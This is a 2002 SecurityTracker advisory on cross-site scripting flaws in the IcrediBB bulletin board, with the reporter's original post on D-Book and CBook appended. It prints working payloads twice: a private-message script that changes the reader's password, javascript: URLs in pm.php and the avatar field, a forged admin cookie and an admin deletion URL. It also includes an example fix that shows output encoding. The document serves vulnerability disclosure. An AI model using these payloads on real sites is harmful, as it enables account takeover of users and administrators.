SecurityTracker.com
SecurityTracker Archives

Category:   Application (Forum/Board/Portal)  >   IcrediBB
Vendors:   IcrediBB.com
IcrediBB Bulletin Board Allows Cross-Site Scripting Attacks to Steal User and Administrator Authentication Cookies
SecurityTracker Alert ID:  1004075
SecurityTracker URL:  http://securitytracker.com/id/1004075
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Apr 17 2002
Impact:   Disclosure of authentication information, Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.1 beta
Description:   Several vulnerabilities were reported in the IcrediBB PHP-based bulletin board software. A remote user can conduct cross-site scripting attacks against IcrediBB users to gain access to any user's account, including an administrative user.

It is reported that IcrediBB stores authentication tokens in user cookies. It is also reported that many components of the software do not filter user-supplied input: the subject and body of a private message, the images parameter of the private message form, and the avatar URL option are written into pages without HTML encoding, and the image fields accept javascript: URLs. A remote user can therefore inject HTML containing malicious Javascript into a message so that, when the message is displayed to another (victim) IcrediBB user, the Javascript is executed by the victim's browser. Because the script is served from the site running IcrediBB, it runs in that site's origin and can read the victim's cookies for that site, including the authentication token. Script running in the victim's session can also drive the board's own functions directly; the first demonstration payload below uses this to change the victim's password through usercp.php without stealing any cookie.

Some demonstration exploit code is provided by the author of the report:

- To change the password of whoever reads the message, in a private message :
<sc*ript>
window.open('usercp.php?function=changepass&newpassword=PASS&passverify=PASS&submitnewpass=Submit');
window.open('usercp.php?function=changepass&newpassword=PASS&passverify=PASS&submitnewpass=Submit');
window.open('usercp.php?function=changepass&newpassword=PASS&passverify=PASS&submitnewpass=Submit');
window.open('index.php?function=logout');
window.open('usercp.php?function=changepass&newpassword=PASS&passverify=PASS&submitnewpass=Submit');
</s*cript>

(remove the '*' characters; they are inserted only so that the advisory text itself does not contain a live script tag)

- In the subject of a private message :
<script>ANYSCRIPT</script>

- In the web browser, as requests against the board's pm.php (%2F and %3B are the URL-encoded '/' and ';') :

/pm.php?function=sendpm&to=VICTIM&subject=SUBJECT&images=javascript:alert('hello')&message=MESSAGE&submitpm=Submit PM

/pm.php?function=sendpm&to=VICTIM&subject=SUBJECT&images=javascript:window.open('http:%2F%2Fwww.url.com')&message=MESSAGE&submitpm=Submit PM

/pm.php?function=sendpm&to=VICTIM&subject=SUBJECT&images=javascript:a='http:%2F%2Fwww.url.com'%3Bwindow.open(a)%3B&message=MESSAGE&submitpm=Submit PM

- As the avatar URL in /usercp.php?function=avataroptions (%27 is the URL-encoded single quote) :
javascript:alert(%27HeLLo%27)
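The vectors above share one root cause: values a user typed into the private message form or the avatar option are written back into HTML untouched. The following is an added example, not code from IcrediBB or from the advisory's author, written as a small Node.js module. It shows the rendering bug beside a hardened renderer that HTML-encodes every user-supplied value at output time and allow-lists the scheme of the image URL. The field names subject, images and message mirror the pm.php parameters in the requests above; the renderer, the placeholder image path and the sample message are assumptions.

```javascript
// Added example (not IcrediBB code, not the advisory author's code): the
// output-encoding bug behind the private message vectors and a hardened
// renderer, as a Node.js module.  Field names mirror the pm.php parameters
// (subject, images, message); renderer, placeholder and sample are assumed.

// Vulnerable: values are concatenated into HTML untouched, so <script> in
// the subject reaches the victim's browser as markup and a javascript: URL
// in the images field becomes an executable img target.
function renderPmVulnerable(pm) {
  return '<h2>' + pm.subject + '</h2>' +
         '<img src="' + pm.images + '">' +
         '<p>' + pm.message + '</p>';
}

// Escape for HTML text content and double-quoted attribute values.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Allow-list the scheme of a user-supplied image URL.  The WHATWG URL
// parser (Node's URL class) lower-cases the scheme and discards the leading
// whitespace and embedded tab/newline characters browsers ignore, so
// ' JaVaScRiPt:', 'java\nscript:', data: and vbscript: all fail the check
// for the same reason: the parsed protocol is not http or https.
function safeImageUrl(raw) {
  const PLACEHOLDER = '/images/blank.gif'; // assumed path
  if (typeof raw !== 'string') return PLACEHOLDER;
  let url;
  try {
    url = new URL(raw);           // relative or malformed input throws
  } catch (e) {
    return PLACEHOLDER;
  }
  if (url.protocol !== 'http:' && url.protocol !== 'https:') return PLACEHOLDER;
  return url.href;
}

// Hardened: every user-controlled value is encoded at the point it is
// written into HTML, and the image URL is validated before encoding.
function renderPmHardened(pm) {
  return '<h2>' + escapeHtml(pm.subject) + '</h2>' +
         '<img src="' + escapeHtml(safeImageUrl(pm.images)) + '">' +
         '<p>' + escapeHtml(pm.message) + '</p>';
}

// Constructed sample built from the payloads in the advisory.
const SAMPLE_PM = {
  subject: '<script>ANYSCRIPT</script>',
  images: "javascript:alert('hello')",
  message: 'MESSAGE',
};
```

The check on the image URL is an allow-list on the parsed scheme rather than a search for the string "javascript:"; a deny-list misses the case, whitespace and entity variants that browsers still execute, and relative URLs are rejected outright because the avatar option is meant to hold an absolute address.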

For additional details, see the author's original advisory (French language), available at:

http://www.ifrance.com/kitetoua/tuto/icrediBB.txt

Impact:   A remote user can conduct cross-site scripting attacks against IcrediBB users and administrators to run arbitrary Javascript in the target's browser in the context of the IcrediBB site. The script can read the target user's authentication cookies for that site or, as in the demonstration payload, change the target's password directly. Either way the remote user gains access to any user's account (including administrative users).
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.icredibb.com/
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Underlying OS Comments:  PHP-based

Message History:   None.


Source Message Contents

Subject:  Security holes : D-Book, CBook, IcrediBB

Product 1 :
D-Book
http://www.smartbb.net

Versions :
1.4 (and less ?)

Problems :
- XSS
- Admin access

Exploits :
- [img=javascript:alert(%27hum%27)]
- Cookie "logged,anyvalue" on admin.php

More details in french :
http://www.ifrance.com/kitetoua/tuto/D-Book.txt

translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%2FD-Book.txt&langpair=fr%7Cen&hl=fr&prev=%2Flanguage_tools

****************************************
Product 2 :
CBook

Versions :
1.0.1 beta

Problems :
- XSS
- Access to an admin function (delete all entries)

Exploits :
- <script>ANYSCRIPT</script> on profil
- http://www.site.com/index.php?Change=2

More details in french :
http://www.ifrance.com/kitetoua/tuto/Cbook.txt

translated by google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%2FCbook.txt&langpair=fr%7Cen&hl=fr&prev=%2Flanguage_tools


***********************************************
Product 3:
IcrediBB Bulletin Board System
http://www.icredibb.com

Versions :
1.1 beta

Problems :
- Access to users/admins account
- XSS

Exploits :
- To change password, in a private message :
<sc*ript>
window.open('usercp.php?function=changepass&newpassword=PASS&passverify=PASS&submitnewpass=Submit');
window.open('usercp.php?function=changepass&newpassword=PASS&passverify=PASS&submitnewpass=Submit');
window.open('usercp.php?function=changepass&newpassword=PASS&passverify=PASS&submitnewpass=Submit');
window.open('index.php?function=logout');
window.open('usercp.php?function=changepass&newpassword=PASS&passverify=PASS&submitnewpass=Submit');
</s*cript>
(without '*')

- In subject (private message) :
<script>ANYSCRIPT</script>

- In webbrowser :

/pm.php?function=sendpm&to=VICTIM&subject=SUBJECT&images=javascript:alert('hello')&message=MESSAGE&submitpm=Submit PM

/pm.php?function=sendpm&to=VICTIM&subject=SUBJECT&images=javascript:window.open('http:%2F%2Fwww.url.com')&message=MESSAGE&submitpm=Submit PM

/pm.php?function=sendpm&to=VICTIM&subject=SUBJECT&images=javascript:a='http:%2F%2Fwww.url.com'%3Bwindow.open(a)%3B&message=MESSAGE&submitpm=Submit PM


- In /usercp.php?function=avataroptions :
javascript:alert(%27HeLLo%27)

More details in french :
http://www.ifrance.com/kitetoua/tuto/icrediBB.txt

translated by google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%2FicrediBB.txt&langpair=fr%7Cen&hl=fr&prev=%2Flanguage_tools

**************************************************

frog-m@n




 
 


Copyright 2019, SecurityGlobal.net LLC